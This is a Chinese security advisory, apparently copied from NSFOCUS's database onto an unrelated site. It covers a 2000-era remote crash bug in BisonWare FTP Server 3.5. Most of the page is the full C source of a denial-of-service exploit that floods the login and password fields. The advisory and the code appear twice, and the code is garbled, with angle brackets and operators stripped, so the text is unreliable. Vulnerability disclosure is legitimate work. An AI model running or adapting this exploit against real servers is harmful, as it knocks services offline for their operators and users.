热卖商品
新闻详情
安全研究 - NSFOCUS绿盟科技
来自 : www.nsfocus.net/vulndb/...
发布时间:2021-03-24
BisonWare FTP服务器远程溢出漏洞
发布日期:2000-03-07
更新日期:2000-03-07
受影响系统:BisonWare FTP Server 3.5
- Microsoft Windows 95
- Microsoft Windows NT 4.0
- Microsoft Windows NT 3.5描述:
来源:Roses Labs Security Advisory
BisonWare FTP Server运行在Windows操作系统平台的FTP服务器。其中存在的一个安全漏洞可导致FTP服务器崩溃。
当发送的登录名和口令长度都超过550字符时,将会使FTP服务器崩溃。输出的服务器错误信息如下:
Exception EAccessViolation in module BISONFTP.EXE at
0A0D4858. Access vilation at address 0A0D5858. Read of
address 0A0D5858.
此时必须重新运行BISONFTP.EXE程序才能使服务器恢复工作。
注:此安全漏洞有可能允许远程执行任意代码。
测试方法:
/*
* FILE: rlxbison.c
* CODER: Conde Vampiro.
* DATE: 2/29/2000.
* ABSTRACT: Remote DoS of BISON FTP Server 3.5
*
* Compile: gcc rlxbison.c -o rlbison
*
* Roses Labs / w00w00
* http://www.roses-labs.com
* Advanced Security Research.
*/
#include stdio.h
#include sys/socket.h
#include string.h
#include netdb.h
#include netinet/in.h
#include sys/types.h
#include arpa/inet.h
#include unistd.h
/* Defines */
#define MAX 551
#define MAXDATA 1024
/* Global variables */
int sock;
int i;
char datacrap[MAX];
char *temp;
char tempdata[MAXDATA];
char buf[MAXDATA];
struct hostent *host;
struct sockaddr_in KillFTP;
/* Prototypes */
unsigned long resolve(char *host_name);
char *crap(int num);
/* Main */
int main(int argc, char *argv[]) {
if(argc 2) {
printf( Usage: %s Host \\n , argv[0]);
exit(-1);
}
KillFTP.sin_family=AF_INET;
KillFTP.sin_addr.s_addr=resolve(argv[1]);
if(!KillFTP.sin_addr.s_addr) {
printf( Host Unkown: %s\\n ,argv[1]);
exit(-1);
}
KillFTP.sin_port=htons(21);
sock=socket(AF_INET, SOCK_STREAM, 0);
if(sock 0) {
printf( Error creating socket!!\\n
exit(-1);
}
if(!connect(sock,(struct sockaddr *) KillFTP, sizeof(KillFTP))) {
printf( Roses Labs Bison FTP Xploit\\n
printf( Remote crashing code!!!\\n
recv(sock,tempdata,sizeof(tempdata),0);
sleep(1);
recv(sock,tempdata,sizeof(tempdata),0);
temp=crap(MAX);
sprintf(buf, LOGIN %s\\n ,temp);
send(sock,buf,strlen(buf),0);
sprintf(buf, PASS %s\\n ,temp);
send(sock,buf,strlen(buf),0);
printf( Host %s crashed!!\\n ,argv[1]);
exit(0);
} else {
printf( Couldn\'t connect to %s on port 21,\\n , argv[1]);
exit(-1);
}
if(close(sock)) {
printf( Error closing socket!!\\n
exit(-1);
}
return(0);
}
/* Functions */
unsigned long resolve(char *host_name) {
struct in_addr addr;
struct hostent *host_nam;
if((addr.s_addr = inet_addr(host_name)) == -1) {
if(!(host_nam = gethostbyname(host_name))) return(0);
memcpy((char *) addr.s_addr, host_nam- h_addr, host_nam- h_length);
}
return(addr.s_addr);
}
char *crap(int num) {
for(i=0;i i++) {
datacrap[i]=\'X\';
}
return(datacrap);
}
/* w00w00 E0F */
建议:
暂无。等待并升级至BisonWare FTP服务器新版本v4.1。
浏览次数:6482
严重程度:0(网友投票)
发布日期:2000-03-07
更新日期:2000-03-07
受影响系统:BisonWare FTP Server 3.5
- Microsoft Windows 95
- Microsoft Windows NT 4.0
- Microsoft Windows NT 3.5描述:
来源:Roses Labs Security Advisory
BisonWare FTP Server运行在Windows操作系统平台的FTP服务器。其中存在的一个安全漏洞可导致FTP服务器崩溃。
当发送的登录名和口令长度都超过550字符时,将会使FTP服务器崩溃。输出的服务器错误信息如下:
Exception EAccessViolation in module BISONFTP.EXE at
0A0D4858. Access vilation at address 0A0D5858. Read of
address 0A0D5858.
此时必须重新运行BISONFTP.EXE程序才能使服务器恢复工作。
注:此安全漏洞有可能允许远程执行任意代码。
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
/*
* FILE: rlxbison.c
* CODER: Conde Vampiro.
* DATE: 2/29/2000.
* ABSTRACT: Remote DoS of BISON FTP Server 3.5
*
* Compile: gcc rlxbison.c -o rlbison
*
* Roses Labs / w00w00
* http://www.roses-labs.com
* Advanced Security Research.
*/
#include stdio.h
#include sys/socket.h
#include string.h
#include netdb.h
#include netinet/in.h
#include sys/types.h
#include arpa/inet.h
#include unistd.h
/* Defines */
#define MAX 551
#define MAXDATA 1024
/* Global variables */
int sock;
int i;
char datacrap[MAX];
char *temp;
char tempdata[MAXDATA];
char buf[MAXDATA];
struct hostent *host;
struct sockaddr_in KillFTP;
/* Prototypes */
unsigned long resolve(char *host_name);
char *crap(int num);
/* Main */
int main(int argc, char *argv[]) {
if(argc 2) {
printf( Usage: %s Host \\n , argv[0]);
exit(-1);
}
KillFTP.sin_family=AF_INET;
KillFTP.sin_addr.s_addr=resolve(argv[1]);
if(!KillFTP.sin_addr.s_addr) {
printf( Host Unkown: %s\\n ,argv[1]);
exit(-1);
}
KillFTP.sin_port=htons(21);
sock=socket(AF_INET, SOCK_STREAM, 0);
if(sock 0) {
printf( Error creating socket!!\\n
exit(-1);
}
if(!connect(sock,(struct sockaddr *) KillFTP, sizeof(KillFTP))) {
printf( Roses Labs Bison FTP Xploit\\n
printf( Remote crashing code!!!\\n
recv(sock,tempdata,sizeof(tempdata),0);
sleep(1);
recv(sock,tempdata,sizeof(tempdata),0);
temp=crap(MAX);
sprintf(buf, LOGIN %s\\n ,temp);
send(sock,buf,strlen(buf),0);
sprintf(buf, PASS %s\\n ,temp);
send(sock,buf,strlen(buf),0);
printf( Host %s crashed!!\\n ,argv[1]);
exit(0);
} else {
printf( Couldn\'t connect to %s on port 21,\\n , argv[1]);
exit(-1);
}
if(close(sock)) {
printf( Error closing socket!!\\n
exit(-1);
}
return(0);
}
/* Functions */
unsigned long resolve(char *host_name) {
struct in_addr addr;
struct hostent *host_nam;
if((addr.s_addr = inet_addr(host_name)) == -1) {
if(!(host_nam = gethostbyname(host_name))) return(0);
memcpy((char *) addr.s_addr, host_nam- h_addr, host_nam- h_length);
}
return(addr.s_addr);
}
char *crap(int num) {
for(i=0;i i++) {
datacrap[i]=\'X\';
}
return(datacrap);
}
/* w00w00 E0F */
建议:
暂无。等待并升级至BisonWare FTP服务器新版本v4.1。
浏览次数:6482
严重程度:0(网友投票)
本文链接: http://bisonlabs.immuno-online.com/view-677917.html
发布于 : 2021-03-24
阅读(0)
最新动态
2021-03-24
2021-03-24
2021-03-24
2021-03-24
2021-03-24
2021-03-24
2021-03-24
2021-03-24
2021-03-24
2021-03-24
2017-11-09
2021-03-24
联络我们
